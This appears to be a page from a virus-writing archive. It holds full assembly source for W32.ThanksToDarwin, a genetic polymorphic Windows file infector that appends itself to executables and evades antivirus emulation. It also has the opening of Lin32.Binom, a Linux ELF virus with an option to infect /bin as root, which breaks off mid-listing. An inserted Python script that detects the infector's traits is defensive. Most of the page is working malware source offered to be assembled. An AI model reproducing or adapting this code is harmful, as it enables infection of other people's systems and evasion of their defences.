push edx call getsptrs sptrs: db do_ptr_low-sptrs,do_ptr_high-sptrs,do_ctr_low-sptrs,do_ctr_high-sptrs db do_tmp_low-sptrs,do_ptrtmp-sptrs,do_ptrptr-sptrs,do_ctrctr-sptrs db do_docjmp-sptrs,do_mlbl-sptrs,do_edword-sptrs,do_ebyte-sptrs db do_size_dword-sptrs,do_tmptmp-sptrs,do_ecd-sptrs getsptrs: pop edx mov al, byte [edx+eax] ; select the appropiate handler add edx, eax sub eax, eax call edx pop edx jmp resume_process ; from here on different handlers do_ecd: push edx edi xchg esi, edx mov ecx, [vsized] mov esi, [estart] mov edi, esi _encrypt: lodsd call edx stosd loop _encrypt push 1 pop ecx pop edi edx ret do_ptr_high: mov ah, [ebx+0] ; fix registers shl ah, 3 ; ... ret do_ctr_high: mov ah, [ebx+1] shl ah, 3 ret do_tmptmp: mov ah, [ebx+2] shl ah, 3 do_tmp_low: or ah, [ebx+2] ret do_ptrtmp: mov ah, [ebx+2] shl ah, 3 jmp do_ptr_low do_ptrptr: mov ah, [ebx+0] shl ah, 3 do_ptr_low: or ah, [ebx+0] ret do_ctrctr: call do_ctr_high do_ctr_low: or ah, [ebx+1] ret do_docjmp: mov eax, [lbler] ; calculate jump difference sub eax, edi dec eax stosb ret do_mlbl: mov [lbler], edi ret do_edword: mov eax, [_edword] jmp store_zero do_size_dword: mov eax, [vsized] store_zero: stosd sub eax, eax ret do_ebyte: mov al, [_ebyte] stosb ret decryptor_done: mov esp, ebp pop ebp pop dword [ebp+lregsstart+4-inner_delta] ; restore old stuff pop dword [ebp+lregsstart-inner_delta] ; pop dword [ebp+bgpe_dna-inner_delta] ; mov [esp+4*7], edi popad sub eax, edi ret bgpe_rand: mov eax, [ebp+7*4] rol eax, 7 neg ax add eax, 0B78F23A5h ; just a number xor [ebp+7*4], eax ; save for later ret ; ¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤ ; Copyright BlueOwl 2004 ; Have a nice time. EOF.

sources

W32.ThanksToDarwin BlueOwl

; W32.ThanksToDarwin by BlueOwl
; ---------------------------------------------------------------------
;
; W32.ThanksToDarwin is my first genetic polymorphic virus. Unlike normal
; polymorphic viruses, which generate their decryptors at random, this virus
; will use its genes to do so, and only a few adaptations are made each
; time to the genes. This way, its offspring will look like it and thus
; inherit the genes that made it survive. All thanks to Darwinian
; evolution :).
;
; Disclaimer: I do mention how fun it is to assemble and try this out
;             a few times in this article. I am not responsible for any
;             loss though. I did my best.
;
; Results with (not yet updated) antivirus scanners in my tests:
;   1st generation detection: 100%
;   2nd generation detection: 70%
;   3rd generation detection: 5%
;   4th generation detection: 4%
;   (no difference after this)
;
; Because of the gene-giving even if only a small fraction survived their
; offspring would infect good because they 'know what worked'.
;
; Details: - Can produce 268435456 different decryptors and 65536 different
;            encryptions. In all, 17592186044416 different viruses. Leave
;            it up to evolution to find that perfect one!
;          - Infection mark = milliseconds and seconds of the creation date
;            set to zero
;          - Does not restore the original file's dates on purpose: file
;            checkers that see the file has been changed will sooner alert
;            when the program date did not change, as this is typical virus
;            behaviour
;          - Will only infect the current directory so if you like you can
;            try the virus without having to fear getting your whole computer
;            infected
;          - On some points, the virus could do a lot better, I just didn't
;            feel like making it that good. I hope you are inspired to make
;            a genetic virus which is lots better though.
;
; Note: if you choose to assemble it please note that the 1st generation
;       will crash when it tries to return to the original host (because
;       there is none ;)).
; ; Thanks to: Docter Ludwig for his book "The big black book of ; computer virusses", with some data about genetic ; virusses in the DOS days. ; ; Assemble with FASM (http://www.flatassembler.net) ; ; ; 17-3-2004 Note: After this version I made lots of other (unpublished, ; yet?) virusses but I decided to publish this anyways as people ; might learn something from it anyways. The api finding and ; everything is very old school, but just remember it was ; one of my first stupid pe-virusses. I also gave this virus ; a better RNG. ; ; --------------------------------------------------------------------- ; I'm sorry for not commenting it much include '%fasminc%/win32ax.inc' ; Simple equates gzero equ db 0ACh,08h,0C0h,75h,0FBh virus_size equ (end_of_virus-start_of_virus) genes_count equ (mgenes_end-mutate) ; Apis FindFirstFile equ [ebp+(_FindFirstFile-delta)] FindNextFile equ [ebp+(_FindNextFile-delta)] FindClose equ [ebp+(_FindClose-delta)] CreateFile equ [ebp+(_CreateFileA-delta)] ReadFile equ [ebp+(_ReadFile-delta)] WriteFile equ [ebp+(_WriteFile-delta)] CloseHandle equ [ebp+(_CloseHandle-delta)] GlobalAlloc equ [ebp+(_GlobalAlloc-delta)] GlobalLock equ [ebp+(_GlobalLock-delta)] GlobalUnlock equ [ebp+(_GlobalUnlock-delta)] GlobalFree equ [ebp+(_GlobalFree-delta)] SetFileAttributes equ [ebp+(_SetFileAttributes-delta)] FileTimeToLocalFileTime equ [ebp+(_FileTimeToLocalFileTime-delta)] FileTimeToSystemTime equ [ebp+(_FileTimeToSystemTime-delta)] SystemTimeToFileTime equ [ebp+(_SystemTimeToFileTime-delta)] LocalFileTimeToFileTime equ [ebp+(_LocalFileTimeToFileTime-delta)] SetFileTime equ [ebp+(_SetFileTime-delta)] GetProcAddress equ [ebp+(getprocaddr-delta)] start_of_virus: virus_start: mov edx, 12345678h ; this will be filled with the- call delta ; decryptor size delta: pop ebp mov eax, ebp sub eax, edx sub eax, (delta-virus_start) sub eax, 12345678h NEIP: NewEIP equ (NEIP-4) add eax, 12345678h OEIP: OldEIP equ (OEIP-4) mov [ebp+(return_addr-delta)], eax mov esi, [esp] 
sub si, si mov ecx, 20h loop_mz: cmp word [esi], 'MZ' je got_k32 sub esi, 1000h loopne loop_mz jmp goto_host got_k32: mov edx,esi mov [ebp+(k32-delta)], edx mov ebx, [esi+03Ch] add ebx, esi cmp word [ebx], 'PE' je kernel_ok jmp goto_host kernel_ok: mov ebx, [ebx+078h] add ebx, esi mov eax, [ebx+020h] add esi, eax xor ecx, ecx searchexport: lodsd add eax, edx push esi mov esi, eax lodsd cmp eax, 'GetP' jne cagain lodsd cmp eax, 'rocA' jne cagain pop esi jmp got_procaddr cagain: pop esi inc ecx cmp ecx,[ebx+018h] jle searchexport jmp goto_host got_procaddr: mov esi,[ebx+01Ch] add esi,edx inc ecx addj: lodsd add eax,edx loop addj done: mov [ebp+(getprocaddr-delta)],eax lea esi, [ebp+(k32_apis-delta)] get_apis: push esi push [ebp+(k32-delta)] call GetProcAddress mov ebx, eax gzero mov edi, esi mov eax, ebx stosd mov esi, edi mov al, [esi] or al, al jnz get_apis pushad lea edi, [ebp+(cpy-delta)] lea esi, [ebp+(mutate-delta)] mov ecx, (mutateend-mutate) rep movsb popad push 314d push GMEM_MOVEABLE call GlobalAlloc or eax, eax jz goto_host mov [ebp+(findmem_handle-delta)], eax push eax call GlobalLock mov [ebp+(findmem-delta)], eax push eax lea eax, [ebp+(search_mask-delta)] push eax call FindFirstFile mov [ebp+(find_handle-delta)], eax inc eax jz search_end infect_file: mov eax, [ebp+(findmem-delta)] lea eax, [eax+4] lea ebx, [ebp+(filetime-delta)] push ebx push eax call FileTimeToLocalFileTime lea eax, [ebp+(systemtime-delta)] push eax lea ebx, [ebp+(filetime-delta)] push ebx call FileTimeToSystemTime mov ax, [ebp+(smsecond-delta)] cmp ax, 0 jne host_ok mov ax, [ebp+(ssecond-delta)] cmp ax, 0 je already_infected host_ok: mov [ebp+(smsecond-delta)], 0 mov [ebp+(ssecond-delta)], 0 call infection already_infected: push [ebp+(findmem-delta)] push [ebp+(find_handle-delta)] call FindNextFile or eax, eax jnz infect_file push [ebp+(find_handle-delta)] call FindClose search_end: push [ebp+(findmem_handle-delta)] call GlobalUnlock push [ebp+(findmem_handle-delta)] call GlobalFree 
or ebp, ebp jz skip_jump goto_host: push [ebp+(return_addr-delta)] skip_jump: ret ; ----------------------------------------------------------------------------------- infection: push 0 push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 0 push FILE_SHARE_READ push GENERIC_READ mov ebx, [ebp+(findmem-delta)] add ebx, 44 push ebx call CreateFile mov [ebp+(file_handle-delta)], eax mov edx, eax inc eax jz return_infect ; can't open mov eax, [ebp+(findmem-delta)] mov eax, [eax+32] add eax, (virus_size+600) ; make some room (+600 to be sure) push eax push GMEM_MOVEABLE call GlobalAlloc or eax, eax jz close_file ; can't allocate mov [ebp+(filemem_handle-delta)], eax push eax call GlobalLock mov [ebp+(filemem-delta)], eax push 0 lea ebx, [ebp+(NBR-delta)] push ebx mov eax, [ebp+(findmem-delta)] push dword [eax+32] push [ebp+(filemem-delta)] push [ebp+(file_handle-delta)] call ReadFile or eax, eax jz close_mem push [ebp+(file_handle-delta)] call CloseHandle mov eax, [ebp+(filemem-delta)] mov esi, [eax+3Ch] add esi, eax ; get pointer to pe header cmp dword [esi], "PE" jne close_mem mov eax, [esi+3Ch] mov [ebp+(file_align-delta)], eax mov edi, esi movzx eax, word [edi+06h] dec eax imul eax,eax,28h ; * 28 add esi,eax ; add esi,78h ; dir table mov edx,[edi+74h] ; dir entries shl edx,3 ; * 8 add esi,edx ; last section mov eax,[edi+28h] ; get entrypoint mov dword [ebp+(OldEIP-delta)],eax ; save mov edx,[esi+10h] ; edx = size of raw data mov ebx,edx ; add edx,[esi+14h] ; add pointer to raw data push edx mov eax,ebx add eax,[esi+0Ch] ; eax = new eip mov [edi+28h],eax ; change it mov dword [ebp+(NewEIP-delta)],eax mov [ebp+(sheader-delta)], esi mov [ebp+(dheader-delta)], edi pop edx or dword [esi+24h],0A0000020h ; put writeable, readable, executable xchg edi,edx add edi,dword [ebp+(filemem-delta)] ; save the stuff for later mov [ebp+(start_host-delta)], edi pushad lea esi, [ebp+(cpy-delta)] lea edi, [ebp+(mutate-delta)] mov ecx, (mutateend-mutate) rep movsb ; save the genes dw 310Fh 
xor [ebp+(random_seed-delta)], eax ; randomize xor [ebp+(startkey-delta)], al ; .. xor [ebp+(slidingkey-delta)], ah ; .. lea esi, [ebp+(mutate-delta)] mov edi, esi mov ecx, genes_count decide_loop: sub eax, eax ; randomize the genes mov al, genes_count call rand_index or eax, eax jnz noswitch lodsb xor al, 1 ; switch gene off/on stosb jmp switched noswitch: movsb switched: dec ecx jne decide_loop mov ecx, 6 lea esi, [ebp+(regs-delta)] decide2_loop: mov eax, 5 call rand_index mov ebx, eax mov al, [esi] xchg al, [esi+ebx] mov [esi], al dec ecx jne decide2_loop popad ; --------------------------------------------------------------------------- original_esp equ [edx-(1*4)] so_virus equ [edx-(2*4)] so_void equ [edx-(3*4)] vsize equ [edx-(4*4)] pos_callplace equ [edx-(5*4)] ads_distance equ [edx-(6*4)] ads_size equ [edx-(7*4)] start_loop equ [edx-(8*4)] poly_generator: mov edx, esp ; stack to edx push esp push esi push edi push ecx ; Gene for cutting of emulation ; ----------------------------- cmp [ebp+(gene_noemul-delta)], 0 je no_emul mov ax, 0C029h stosw mov ax, 0C8FEh ; sub eax, eax stosw ; keep_going: dec al mov ax, 0C008h ; or al, al stosw ; je was_oke mov ax, 0474h ; jne keep_going stosw ; jmp somewhere_in_code mov ax, 0F875h ; was_oke: stosw mov ax, 67EBh stosw no_emul: ; Extra anti emulation ; -------------------- cmp [ebp+(gene_specialkey-delta)], 0 jne skipskey cmp [ebp+(startkey-delta)], 0 je skipskey ; here an av would get mov ax, 1829h ; forced to loop X times or ah, [ebp+(gene_encrypt-delta)] ; in order to get the shl ah, 3 ; encryption key or ah, [ebp+(gene_encrypt-delta)] ; if it doesn't (and most- stosw ; don't) the virus body mov ax, 0C929h ; will be wrongly de- stosw ; crypted mov al, 0B1h stosb mov al, [ebp+(startkey-delta)] stosb mov al, 40h or al, [ebp+(gene_encrypt-delta)] stosb mov ax, 0FDE2h cmp [ebp+(gene_specialkeyl-delta)],0 jne no_decskl mov al, 049h stosb mov ax, 0FC75h no_decskl: stosw skipskey: ; Gene for the Call ; ----------------- cmp 
[ebp+(gene_call-delta)], 0 jne callway2 mov al, 0E8h ; call nextbyte stosb push edi sub eax, eax ; " " stosd mov al, 58h or al, [ebp+(gene_memreg-delta)] stosb jmp callend callway2: mov al, 0E8h ; call to_end_of_code stosb push edi stosd callend: ; Gene for adding distance ; ------------------------ mov al, 81h ; this is always in front of ; add and sub cmp [ebp+(gene_distance-delta)],0 jne distance2 mov ah, 0C0h ; add jmp distancedone distance2: mov ah, 0E8h ; sub distancedone: or ah, [ebp+(gene_memreg-delta)] stosw push edi stosd ; Gene for declaring virus-size ; ----------------------------- cmp [ebp+(gene_size-delta)],0 jne size2 mov al, 0B8h ; mov reg, x or al, [ebp+(gene_counter-delta)] stosb jmp size_done size2: cmp [ebp+(gene_sizem-delta)], 0 jne sizem2 mov ax, 01831h ; xor reg, reg or ah, [ebp+(gene_counter-delta)] shl ah, 3 or ah, [ebp+(gene_counter-delta)] stosw jmp sizeput sizem2: mov ax, 01829h or ah, [ebp+(gene_counter-delta)] shl ah, 3 or ah, [ebp+(gene_counter-delta)] stosw sizeput: cmp [ebp+(gene_sizea-delta)], 0 je puts2 mov ax, 0F081h jmp putsand puts2: mov ax, 0C881h putsand: or ah, [ebp+(gene_counter-delta)] stosw size_done: push edi mov eax, virus_size stosd ; Gene for declaring the first ; encryption value ; ---------------------------- cmp [ebp+(gene_specialkey-delta)], 0 je key_done key_normal: cmp [ebp+(gene_1stval-delta)],0 jne firstval2 mov al, 0B8h or al, [ebp+(gene_encrypt-delta)] stosb jmp firstvalend firstval2: cmp [ebp+(gene_1stvalb-delta)], 0 jne firstvalb2 mov ax, 0E083h or ah, [ebp+(gene_encrypt-delta)] stosw sub eax, eax stosb jmp firstvalb_end firstvalb2: mov ax, 01829h or ah, [ebp+(gene_encrypt-delta)] shl ah, 3 or ah, [ebp+(gene_encrypt-delta)] stosw firstvalb_end: cmp [ebp+(gene_addenc-delta)], 0 jne fza2 mov ax, 0C081h or ah, [ebp+(gene_encrypt-delta)] stosw jmp firstvalend fza2: mov ax, 0C881h or ah, [ebp+(gene_encrypt-delta)] stosw firstvalend: push edi sub eax, eax mov al, [ebp+(startkey-delta)] stosd key_done: push edi 
; Get byte gene ; ------------- cmp [ebp+(gene_getbyte-delta)], 0 jne getbyte2 mov al, 08Ah ; xchg or mov jmp getbytedone getbyte2: mov al, 086h getbytedone: mov ah, [ebp+(gene_memreg-delta)] stosw ; Encrypt byte gene ; ----------------- cmp [ebp+(gene_encryptb-delta)], 0 jne eb2 mov ax, 2966h ; sub jmp insbe eb2: mov ax, 3166h ; xor insbe: stosw mov al, 18h or al, [ebp+(gene_encrypt-delta)] shl al, 3 stosb ; Store byte gene ; --------------- mov al, 88h cmp [ebp+(gene_store-delta)], 0 ; xchg or mov again jne store2 mov al, 86h store2: mov ah, [ebp+(gene_memreg-delta)] stosw ; Increment memreg gene ; --------------------- cmp [ebp+(gene_increment-delta)], 0 jne inc2 mov al, 040h ; inc or al, [ebp+(gene_memreg-delta)] stosb jmp incdone inc2: mov ax, 0C083h ; add or ah, [ebp+(gene_memreg-delta)] stosw mov al, 1 stosb incdone: ; Change the encryption key gene ; ------------------------------ cmp [ebp+(gene_slidingkey-delta)], 0 jne no_slidingkey cmp [ebp+(gene_slidingkeym-delta)], 0 jne slidingkey2 mov al, 80h stosb mov al, 0C0h or al, [ebp+(gene_encrypt-delta)] mov ah, [ebp+(slidingkey-delta)] stosw jmp slidingkey_done slidingkey2: mov al, 40h or al, [ebp+(gene_encrypt-delta)] stosb slidingkey_done: no_slidingkey: ; Decrement the encryptcount gene ; ------------------------------- cmp [ebp+(gene_ecount-delta)], 0 jne ecount2 mov ax, 0E883h or ah, [ebp+(gene_counter-delta)] stosw mov al, 1 jmp ecount_done ecount2: mov al, 48h or al, [ebp+(gene_counter-delta)] ecount_done: stosb ; Loop gene ; --------- cmp [ebp+(gene_loop-delta)], 0 jne loop2 mov ax, 0F883h or ah, [ebp+(gene_counter-delta)] stosw sub eax, eax stosb mov ebx, edi sub ebx, start_loop neg bl dec bl dec bl mov al, 75h cmp [ebp+(gene_loop2-delta)], 0 jne loop1b mov al, 77h loop1b: mov ah, bl stosw jmp loopdone loop2: mov ax, 1809h or ah, [ebp+(gene_counter-delta)] shl ah, 3 or ah, [ebp+(gene_counter-delta)] stosw mov ebx, edi sub ebx, start_loop neg bl dec bl dec bl mov al, 75h mov ah, bl stosw loopdone: ; 
Catch call gene ; --------------- cmp [ebp+(gene_call-delta)], 0 je skip_catchcall mov al, 0EBh stosb ; ... mov esi, edi stosb mov eax, edi mov ebx, pos_callplace sub eax, ebx sub eax, 4 mov [ebx], eax mov al, 58h or al, [ebp+(gene_memreg-delta)] stosb cmp [ebp+(gene_callret-delta)], 0 je callret2 mov al, 50h or al, [ebp+(gene_memreg-delta)] mov ah, 0C3h stosw jmp endcallret callret2: mov ax, 0E0FFh or ah, [ebp+(gene_memreg-delta)] stosw endcallret: mov eax, edi sub eax, esi dec eax mov [esi], al skip_catchcall: ; .................................................................................... ender: mov ecx, ads_distance mov eax, edi sub eax, pos_callplace sub eax, 4 cmp [ebp+(gene_distance-delta)], 0 je skip_neg neg eax skip_neg: mov [ecx], eax push edi lea esi,[ebp+(virus_start-delta)] ; copy virus (with changed DNA) mov ecx,virus_size ; to host rep movsb ; pop esi mov eax, esi sub eax, [ebp+(start_host-delta)] mov [esi+1], eax sub ebx, ebx cmp [ebp+(gene_slidingkey-delta)], 0 jne skip_sliding cmp [ebp+(gene_slidingkeym-delta)], 0 jne s_onlyinc mov bl, [ebp+(slidingkey-delta)] dec bl s_onlyinc: inc bl skip_sliding: mov bh, [ebp+(startkey-delta)] push edi mov edi, esi mov ecx, virus_size cmp [ebp+(gene_encryptb-delta)], 0 jne loop_encryptx loop_encrypta: lodsb add al, bh stosb add bh, bl loop loop_encrypta jmp endx loop_encryptx: lodsb xor al, bh stosb add bh, bl loop loop_encryptx endx: pop edi mov esp, original_esp ; --------------------------------------------------------------------------- sub edi, [ebp+(start_host-delta)] mov [ebp+(start_host-delta)], edi push FILE_ATTRIBUTE_NORMAL mov eax, [ebp+(findmem-delta)] lea eax, [eax+44] push eax call SetFileAttributes push 0 push FILE_ATTRIBUTE_NORMAL push CREATE_ALWAYS push 0 push 0 push GENERIC_WRITE mov eax, [ebp+(findmem-delta)] lea eax, [eax+44] push eax call CreateFile mov [ebp+(file_handle-delta)], eax inc eax jz close_mem push 0 lea eax, [ebp+(NBR-delta)] push eax mov eax, [ebp+(findmem-delta)] mov eax, 
[eax+32] add eax, [ebp+(start_host-delta)] mov ecx, [ebp+(file_align-delta)] call align_it push eax mov esi,[ebp+(sheader-delta)] mov edi,[ebp+(dheader-delta)] mov eax,[esi+10h] ; SizeOfRawData add eax,[ebp+(start_host-delta)] ; +virus_size+decryptor_size mov ecx,[edi+3Ch] call align_it mov [esi+10h], eax ; save the new sizes mov [esi+08h], eax ;mov eax,[esi+10h] ; EAX = New SizeOfRawData add eax,[esi+0Ch] mov [edi+50h],eax ; save to size of image push [ebp+(filemem-delta)] push [ebp+(file_handle-delta)] call WriteFile lea eax, [ebp+(filetime-delta)] ; normal time to local filetime push eax lea eax, [ebp+(systemtime-delta)] push eax call SystemTimeToFileTime lea eax, [ebp+(filetime2-delta)] ; local filetime to filetime push eax lea eax, [ebp+(filetime-delta)] push eax call LocalFileTimeToFileTime push 0 ; mark the file as infected push 0 lea eax, [ebp+(filetime2-delta)] push eax push [ebp+(file_handle-delta)] call SetFileTime close_mem: push [ebp+(filemem_handle-delta)] call GlobalUnlock push [ebp+(filemem_handle-delta)] call GlobalFree close_file: push [ebp+(file_handle-delta)] ; set original attributes call CloseHandle mov eax, [ebp+(findmem-delta)] push dword [eax] lea eax, [eax+44] push eax call SetFileAttributes return_infect: ret ; simple align a value ; -------------------- align_it: push edx sub edx, edx push eax div ecx pop eax sub ecx, edx add eax, ecx pop edx ret ; random number between 0 and eax ; (this is a good one!) 
; ------------------------------- rand_index: push edx push ecx push ebx mov ecx, eax inc ecx mov eax, [ebp+(random_seed-delta)] rol eax, 5 ; by me ;) neg ax mov bx, ax sub al, ah bswap eax xor ah, al sub ax, bx mov [ebp+(random_seed-delta)], eax sub edx, edx div ecx mov eax, edx pop ebx pop ecx pop edx ret ; ----------------------------------------------------------------------------------- ; DATA file_handle dd 0 filemem_handle dd 0 ; handles filemem dd 0 file_align dd 0 return_addr dd 0 start_host dd 0 search_mask db "test*.exe",0 find_handle dd 0 findmem_handle dd 0 findmem dd 0 startkey db 11h slidingkey db 9Ch ; The virus DNA ; Feel free to make changes and see ; the decryptor change :) ; --------------------------------- mutate: gene_call db 0 ; should have been just bits, but whatever ;) gene_distance db 0 gene_size db 0 gene_sizem db 0 gene_sizea db 0 gene_1stval db 0 gene_1stvalb db 0 gene_addenc db 0 gene_getbyte db 0 gene_encryptb db 0 gene_store db 0 gene_increment db 0 gene_ecount db 0 gene_loop db 0 gene_loop2 db 0 gene_noemul db 0 gene_callret db 0 gene_slidingkey db 0 gene_slidingkeym db 0 gene_specialkey db 0 gene_specialkeyl db 0 mgenes_end: regs: gene_memreg db 6h ; I think i forgot to make code for changing gene_counter db 1h ; these :D. 
Whatever ;) gene_encrypt db 3h gene_encryptc db 2h gene_junk1 db 5h gene_junk2 db 7h mutateend: cpy rb (mutateend-mutate) filetime dd 0,0 filetime2 dd 0,0 systemtime dw 0,0,0,0,0,0 ssecond dw 0 smsecond dw 0 random_seed dd 93FA017Bh NBR dd 0 k32 dd 0 getprocaddr dd 0 sheader dd 0 dheader dd 0 gptext db 'GetProcAddress',0 ; Api table k32_apis db "FindFirstFileA",0 _FindFirstFile dd 0 db "FindNextFileA",0 _FindNextFile dd 0 db "FindClose",0 _FindClose dd 0 db "CreateFileA",0 _CreateFileA dd 0 db "ReadFile",0 _ReadFile dd 0 db "WriteFile",0 _WriteFile dd 0 db "CloseHandle",0 _CloseHandle dd 0 db "GlobalAlloc",0 _GlobalAlloc dd 0 db "GlobalLock",0 _GlobalLock dd 0 db "GlobalUnlock",0 _GlobalUnlock dd 0 db "GlobalFree",0 _GlobalFree dd 0 db "SetFileAttributesA",0 _SetFileAttributes dd 0 db "FileTimeToLocalFileTime",0 ; apis used for _FileTimeToLocalFileTime dd 0 ; filemarking db "FileTimeToSystemTime",0 _FileTimeToSystemTime dd 0 db "SystemTimeToFileTime",0 _SystemTimeToFileTime dd 0 db "LocalFileTimeToFileTime",0 _LocalFileTimeToFileTime dd 0 db "SetFileTime",0 _SetFileTime dd 0 db 0 end_of_virus: ; &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
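
Added example (not part of the original listing and not BlueOwl's code): a Python triage check for the three file-level traits that the header comment and infection routine above leave behind, namely an entry point inside the last section, a last section carrying the 0A0000020h flags, and a creation timestamp whose seconds and milliseconds are zero. All function names and the sample header bytes are constructed for illustration.

```python
import struct

# Flags the listing ORs into the last section header (0A0000020h).
# Note: this sets CODE | EXECUTE | WRITE; the READ bit (0x40000000) is not part of it.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
APPENDER_FLAGS = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE

TICKS_PER_MS = 10_000            # FILETIME counts 100 ns ticks since 1601-01-01
TICKS_PER_MINUTE = 600_000_000
SAMPLE_MINUTE = 211_000_000 * TICKS_PER_MINUTE   # constructed whole-minute timestamp


def creation_mark_present(filetime_ticks):
    """True when both the seconds and the milliseconds fields are zero."""
    return filetime_ticks % TICKS_PER_MINUTE < TICKS_PER_MS


def parse_sections(data):
    """Return (entry_rva, [(name, vaddr, vsize, raw_size, flags), ...]) or None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)
    if pe_off + 0x2C > len(data) or data[pe_off:pe_off + 4] != b"PE\0\0":
        return None
    (n_sections,) = struct.unpack_from("<H", data, pe_off + 6)
    (opt_size,) = struct.unpack_from("<H", data, pe_off + 20)
    (entry_rva,) = struct.unpack_from("<I", data, pe_off + 0x28)
    table = pe_off + 24 + opt_size
    sections = []
    for i in range(n_sections):
        off = table + 40 * i
        if off + 40 > len(data):
            return None              # truncated section table
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, vaddr, raw_size = struct.unpack_from("<III", data, off + 8)
        (flags,) = struct.unpack_from("<I", data, off + 36)
        sections.append((name, vaddr, vsize, raw_size, flags))
    return entry_rva, sections


def triage(data, creation_ticks):
    """List which of the three traits a file shows; an empty list means none."""
    parsed = parse_sections(data)
    if not parsed or not parsed[1]:
        return []
    entry_rva, sections = parsed
    _name, vaddr, vsize, raw_size, flags = sections[-1]
    findings = []
    if vaddr <= entry_rva < vaddr + max(vsize, raw_size):
        findings.append("entry_in_last_section")
    if flags & APPENDER_FLAGS == APPENDER_FLAGS:
        findings.append("last_section_code_write_execute")
    if creation_mark_present(creation_ticks):
        findings.append("creation_time_zero_seconds")
    return findings


def build_sample(entry_rva, last_flags):
    """Constructed two-section PE32 header block (headers only, no code bytes)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                # AddressOfEntryPoint

    def section(name, vaddr, size, flags):
        return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size,
                           0x400, 0, 0, 0, 0, flags)

    text = section(b".text", 0x1000, 0x600, 0x60000020)
    last = section(b".rsrc", 0x2000, 0x1400, last_flags)
    return dos + b"PE\0\0" + coff + bytes(opt) + text + last


if __name__ == "__main__":
    clean = build_sample(0x1000, 0x40000040)
    odd = build_sample(0x3000, 0x40000040 | APPENDER_FLAGS)
    print("clean:", triage(clean, SAMPLE_MINUTE + 123_456_789))
    print("odd:  ", triage(odd, SAMPLE_MINUTE))
```

Treat the timestamp trait as supporting evidence only, since a legitimate file can also carry a whole-minute creation time; the two section traits together are the stronger signal.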

sources

Lin32.Binom Cyneox ; ; ; _______ __ __ __ _ _______ _____ _ _ ; | \_/ | \ | |______ | | \___/ ; |_____ | | \_| |______ |_____| _/ \_ ; ; ; proudly presents ; ; .____ .__ ________ ________ __________.__ ; | | |__| ____ \_____ \ \_____ \ \______ \__| ____ ____ _____ ; | | | |/ \ _(__ < / ____/ | | _/ |/ \ / _ \ / \ ; | |___| | | \/ \/ \ | | \ | | ( <_> ) Y Y \ ; |_______ \__|___| /______ /\_______ \ /\______ /__|___| /\____/|__|_| / ; \/ \/ \/ \/ \/ \/ \/ ; Date: 2.10.2004 ; ; ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ; -|-|-| I*N*T*R*O*D*U*C*T*I*O*N |-|-|-|- -|-|-|-|-|-| C*O*M*P*I*L*E |-|-|-|-|-|- ; ; Well I dont want to tell you much There are options to compile this ; about this project... Just check source: FUCK_USER or FUCK_SYSTEM ; out the code and build your own ; oppinion. I'd like to thank to all bash:# nasm -f elf -D [OPTION] -o \ ; people on #DCA , #vx-lab , #lin32asm binom.o binom.asm ; for all their support. OPTION=FUCK_USER or FUCK_SYSTEM ; And now something special to my dar- ; ling: Caline I'll always love you. bash:# gcc -o binom binom.o ; ; ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ; -|-|-|-|-|-|-|-|-|-|-|-| A*B*O*U*T |-|-|-|-|-|-|-|-|-|-|-|-|-|-|- ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ; ; Like I said there 2 options.Binom ; means "two" so you'll have 2 versions ; of the virus. Its quite simple since ; it uses macros. ; ; Option FUCK_USER | FUCK_SYSTEM ; ------------------|------------------------------------------ ; Path to infect | "." 
| "/bin" ; ------------------------------------------------------------- ; File type | ELF | ELF ; ------------------------------------------------------------- ; Required rights | normal | root ; ------------------------------------------------------------- ; Infecting | SPI + Abuse of | SPI + Abuse of ; technique | _libc_start_main | shard libraries ; -------------------------------------------------------------- ; | yes(calculating | yes ; EPO |return addr using | ; |relative offsets) | ; -------------------------------------------------------------- ; Payload | yes(print msg) | yes(print msg) ; -------------------------------------------------------------- ; | no (change | no(change push ; Change entry | call instruction | instruction in the ; point | in the startup | startup routine ; | routine) | ; -------------------------------------------------------------- ; Files nr. to | all | all ; infect | | ; -------------------------------------------------------------- ; Invisible | yes(foking to | yes(froking to back- ; | background) | ground) ; -------------------------------------------------------------- ; ; ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ; -|-|-|-|-|-|-|-|-|-|-|-| E*O*F |-|-|-|-|-|-|-|-|-|-|-|-|-|-|- ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| %define SYS.FORK 2 %define SYS.READ 3 %define SYS.WRITE 4 %define SYS.OPEN 5 %define SYS.CLOSE 6 %define SYS.CHDIR 12 %define SYS.LSEEK 19 %define SYS.GETUID 24 %define SYS.GETGID 47 %define SYS.READDIR 89 %define SYS.MMAP 90 %define SYS.UNMMAP 91 %define SYS.STAT 106 %define SYS.GETCWD 183 %define STRUCT_STAT_SZ 64 %define STRUCT_DIRENT_SZ 266 %define 